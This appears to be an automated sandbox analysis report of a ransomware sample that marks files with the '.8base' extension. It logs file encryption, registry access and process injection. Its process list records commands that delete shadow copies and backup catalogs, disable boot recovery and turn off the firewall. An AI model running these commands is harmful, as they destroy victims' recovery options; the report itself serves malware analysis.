File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ro-ro\ui-strings.js.id[5C6843C2-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_zh_TW.properties.id[5C6843C2-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\dd_arrow_small.png C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\vccorlib140.dll C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\video_filter\libmagnify_plugin.dll C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nb-no\ui-strings.js C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremDemoR_BypassTrial365-ppd.xrm-ms.id[5C6843C2-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\OneNote\prnSendToOneNote.cat.id[5C6843C2-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\uninstall\shortcuts_log.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\xaml\onenote\ShareMainPage.xaml C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\wfh.png C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\TimerWideTile.contrast-black_scale-100.png C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\download-btn.png.id[5C6843C2-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Grace-ul-oob.xrm-ms.id[5C6843C2-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\SpreadsheetCompare.HxS C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\fil_get.svg.id[5C6843C2-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\en-US\rtscom.dll.mui C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\de\System.Xml.Linq.Resources.dll C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\EXP_PDF.DLL.id[5C6843C2-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\ShouldNotExist.snippets.ps1xml C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423496926556.profile.gz C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File created C:\Program Files\Java\jre1.8.0_66\bin\dt_shmem.dll.id[5C6843C2-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-24_altform-unplated_contrast-black.png C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\msadco.dll C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.scale-80.png C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Excel.Amo.Core.dll C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\VBAOWS10.CHM C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\es\Microsoft.Build.Utilities.v3.5.resources.dll C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_checkbox_unselected_18.svg C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msaddsr.dll.mui C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup-impl.xml C:\Users\Admin\AppData\Local\Temp\233.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\orsbwqnkccnffcxpogd.job C:\Users\Admin\AppData\Local\Temp\3F9.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\hhftgie N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\bwll.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\hhftgie N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\hhftgie N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\bwll.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\bwll.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1032500962-593345068-3128969974-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance N/A N/A
Key created \REGISTRY\USER\S-1-5-21-1032500962-593345068-3128969974-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\233.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Roaming\hhftgie N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\233.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2156 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe
PID 2156 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe
PID 2156 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe
PID 2156 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe
PID 2156 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe
PID 2156 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe
PID 3200 wrote to memory of 3216 N/A N/A C:\Users\Admin\AppData\Local\Temp\FFA2.exe
PID 3200 wrote to memory of 3216 N/A N/A C:\Users\Admin\AppData\Local\Temp\FFA2.exe
PID 3200 wrote to memory of 3216 N/A N/A C:\Users\Admin\AppData\Local\Temp\FFA2.exe
PID 3200 wrote to memory of 4952 N/A N/A C:\Users\Admin\AppData\Local\Temp\233.exe
PID 3200 wrote to memory of 4952 N/A N/A C:\Users\Admin\AppData\Local\Temp\233.exe
PID 3200 wrote to memory of 4952 N/A N/A C:\Users\Admin\AppData\Local\Temp\233.exe
PID 3200 wrote to memory of 2112 N/A N/A C:\Users\Admin\AppData\Local\Temp\3F9.exe
PID 3200 wrote to memory of 2112 N/A N/A C:\Users\Admin\AppData\Local\Temp\3F9.exe
PID 3200 wrote to memory of 2112 N/A N/A C:\Users\Admin\AppData\Local\Temp\3F9.exe
PID 3200 wrote to memory of 2748 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 2748 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 2748 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 2748 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 1464 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 1464 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 1464 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 3616 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3616 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3616 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3616 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3856 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3856 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3856 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3856 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 4768 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 4768 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 4768 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 4768 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 2744 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 2744 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 2744 N/A N/A C:\Windows\explorer.exe
PID 4952 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\233.exe C:\Windows\system32\cmd.exe
PID 4952 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\233.exe C:\Windows\system32\cmd.exe
PID 4952 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\233.exe C:\Windows\system32\cmd.exe
PID 4952 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\233.exe C:\Windows\system32\cmd.exe
PID 3200 wrote to memory of 4224 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 4224 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 4224 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 4224 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 1236 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 1236 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 1236 N/A N/A C:\Windows\explorer.exe
PID 4704 wrote to memory of 2376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4704 wrote to memory of 2376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3080 wrote to memory of 4076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3080 wrote to memory of 4076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3200 wrote to memory of 2916 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 2916 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 2916 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 2916 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 1592 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 1592 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 1592 N/A N/A C:\Windows\explorer.exe
PID 4704 wrote to memory of 3016 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4704 wrote to memory of 3016 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3080 wrote to memory of 4628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3080 wrote to memory of 4628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3200 wrote to memory of 3836 N/A N/A C:\Windows\SysWOW64\explorer.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1032500962-593345068-3128969974-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1032500962-593345068-3128969974-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe

"C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe"

C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe

"C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe"

C:\Users\Admin\AppData\Local\Temp\FFA2.exe

C:\Users\Admin\AppData\Local\Temp\FFA2.exe

C:\Users\Admin\AppData\Local\Temp\233.exe

C:\Users\Admin\AppData\Local\Temp\233.exe

C:\Users\Admin\AppData\Local\Temp\3F9.exe

C:\Users\Admin\AppData\Local\Temp\3F9.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\233.exe

"C:\Users\Admin\AppData\Local\Temp\233.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=disable

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Users\Admin\AppData\Local\Temp\FFA2.exe

"C:\Users\Admin\AppData\Local\Temp\FFA2.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sv.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SRD.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\SRD.bat"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\sv.bat"

C:\Users\Admin\AppData\Local\Temp\sv.bat.exe

